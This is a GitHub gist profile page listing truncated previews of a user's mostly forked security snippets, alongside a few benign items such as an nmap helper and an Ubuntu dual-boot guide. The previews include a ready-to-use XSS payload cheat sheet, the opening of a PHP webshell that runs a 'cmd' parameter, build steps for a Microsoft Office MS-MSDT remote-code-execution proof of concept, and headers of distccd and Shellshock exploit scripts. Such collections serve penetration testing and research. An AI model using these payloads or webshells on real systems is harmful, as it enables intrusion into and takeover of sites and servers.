Skip to content

Instantly share code, notes, and snippets.

View cxzero's full-sized avatar
☺️

Juan Pablo Perata cxzero

☺️
70 followers · 897 following
View GitHub Profile
@cxzero
cxzero / watcher-executor.cs
Created July 19, 2024 20:38 — forked from 2S1one/watcher-executor.cs
using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Diagnostics;
public class FileWatcher
{
static FileSystemWatcher watcher;
static Process p;
@cxzero
cxzero / watcher-network.cs
Created July 19, 2024 20:38 — forked from 2S1one/watcher-network.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Net.Sockets;
namespace tcp_client_file_write
{
internal class Program
{
@cxzero
cxzero / ms-msdt.MD
Created June 10, 2022 01:30 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@cxzero
cxzero / xss_vectors.txt
Created May 13, 2022 16:17 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@cxzero
cxzero / nmapPorts.sh
Last active June 13, 2022 16:00
Utility to extract ports from nmap grepable output
#!/bin/bash
# To be used with nmap grepable output (-oG option)
if [ -z $1 ]; then
echo "Usage: $(basename $0) <grepable-nmap-input-file>"
exit -1
fi
ports="`cat $1 | grep -oP '\s\K[0-9]+(?=/)'`"
echo $ports | xargs | sed 's/ /,/g'
@cxzero
cxzero / distccd_rce_CVE-2004-2687.py
Created August 14, 2021 17:50 — forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
https://www.exploit-db.com/exploits/9915
@cxzero
cxzero / command.xml
Created July 16, 2021 13:38 — forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page if you want a html wrapper to present the file can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID the successful response in as an example)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
@cxzero
cxzero / readme.md
Last active June 1, 2021 18:37
Install Ubuntu 20.04 LTS alongside dual boot with Windows 10

Recently I have found a little harder to set up a dual boot installation Ubuntu 20.04 LTS / Windows 10 in a laptop. It involved:

  1. Switch SSD operation mode from RST to AHCI
  2. Prepare usb stick for Ubuntu iso image to load in UEFI mode (BIOS does not support legacy mode)
  3. Shrink Windows 10 partition
  4. Ubuntu 20.04 installation, create encrypted LVM partition
  5. Enjoy the set up

1 - Switch SSD operation mode from RST to AHCI

@cxzero
cxzero / easy-simple-php-webshell.php
Created May 12, 2021 03:27 — forked from joswr1ght/easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@cxzero
cxzero / exploit.py
Created May 1, 2021 05:02 — forked from claudijd/exploit.py
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271